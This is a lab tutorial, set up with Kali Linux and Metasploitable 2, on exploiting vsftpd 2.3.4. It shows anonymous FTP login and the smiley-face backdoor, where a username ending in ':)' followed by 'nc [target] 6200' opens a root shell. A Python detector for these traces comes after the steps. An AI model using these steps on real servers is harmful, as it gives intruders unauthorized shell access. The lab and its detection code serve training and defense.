
FTP Anonymous Login Issue and Smiley Face Attack

FTP Anonymous Login Issue:


Many network services can be attacked if they are not kept up to date. There are many well-known issues, such as the FTP anonymous login issue, that can be exploited. vsftpd version 2.3.4 has a flaw: this version is vulnerable to anonymous login. That means anyone can log in to FTP using the username anonymous, and the password can be anything or left blank.


Deliverable:


Lab Set up

  • Virtualization using Oracle VirtualBox

  • Attacker’s System: Kali Linux

  • Target System : Metasploitable 2


In Kali Linux --> Terminal


1. Connect to the FTP of target.

~# ftp [IP address of target] (Enter)


2. Input Name as 'anonymous' and Password as anything or just keep it blank.

> NAME--> anonymous (Enter)

> PASSWORD--> anything or keep it blank (Enter)


3. You now have an FTP shell on the target and can run any FTP command with guest privileges.



Smiley Face Attack:


The same version of FTP, i.e. vsftpd 2.3.4, is vulnerable to another attack. Here, while entering the Name and Password, put a smiley face, i.e. :), at the end of the name; the password can be anything. The connection hangs after the password, and you can then get a shell on the target using the tool Netcat.


Deliverable:


Lab Set up

  • Virtualization using Oracle VirtualBox

  • Attacker’s System: Kali Linux

  • Target System : Metasploitable 2


In Kali Linux --> Terminal


1. Connect to the FTP of target.

~# ftp [IP address of target] (Enter)


2. Input a Name ending with a smiley face :) and Password as anything.

> NAME--> Parag:) (Enter)

> PASSWORD--> anything (Enter)


3. It will hang after password.


4. Now, in another terminal of Kali Linux, use Netcat to connect to the target.

~# nc [IP address of target] 6200 (Enter)


Here, nc --> Netcat

6200 --> Port Number


5. You now have a shell on the target and can run any command on the target system from Kali Linux.
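
From the defender's side, both behaviours in this lab leave a recognisable trace: a USER command with the name anonymous, and a USER name containing :) followed shortly by a connection to port 6200 on the same server. The following is an added example, not part of the original lab; the event format, the sample lines, the alert names and the 60-second window are assumptions made for illustration.

```python
# Constructed sample events in a hypothetical format (not vsftpd's own log format):
# "<epoch seconds> <client> <server> <server port> <FTP command | CONNECT>"
SAMPLE_EVENTS = """\
1000 10.0.0.5 10.0.0.20 21 USER anonymous
1001 10.0.0.5 10.0.0.20 21 PASS guest
1050 10.0.0.7 10.0.0.20 21 USER Parag:)
1051 10.0.0.7 10.0.0.20 21 PASS anything
1055 10.0.0.7 10.0.0.20 6200 CONNECT
1200 10.0.0.9 10.0.0.21 21 USER alice
1300 10.0.0.9 10.0.0.21 6200 CONNECT
"""

BACKDOOR_PORT = 6200  # port used in step 4 on this page
WINDOW = 60           # assumed correlation window, in seconds


def detect(events_text, window=WINDOW):
    """Return (timestamp, server, alert) tuples for the two behaviours on this page."""
    alerts = []
    last_smiley = {}  # server -> time of the most recent USER containing ":)"
    for line in events_text.splitlines():
        parts = line.split(maxsplit=4)
        if len(parts) != 5:
            continue  # skip malformed lines
        ts, _client, server, port, payload = parts
        ts, port = int(ts), int(port)
        verb, _, arg = payload.partition(" ")
        if port == 21 and verb.upper() == "USER":
            if arg.strip().lower() == "anonymous":
                alerts.append((ts, server, "anonymous-login-attempt"))
            if ":)" in arg:
                last_smiley[server] = ts
                alerts.append((ts, server, "smiley-in-username"))
        elif port == BACKDOOR_PORT and verb == "CONNECT":
            seen = last_smiley.get(server)
            # Correlate per server: the port 6200 connection may come from any client.
            if seen is not None and 0 <= ts - seen <= window:
                alerts.append((ts, server, "port-6200-after-smiley"))
            else:
                alerts.append((ts, server, "port-6200-uncorrelated"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The uncorrelated case is kept as its own alert because a connection to port 6200 with no preceding :) login may be unrelated traffic and deserves a lower priority than the correlated pair.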


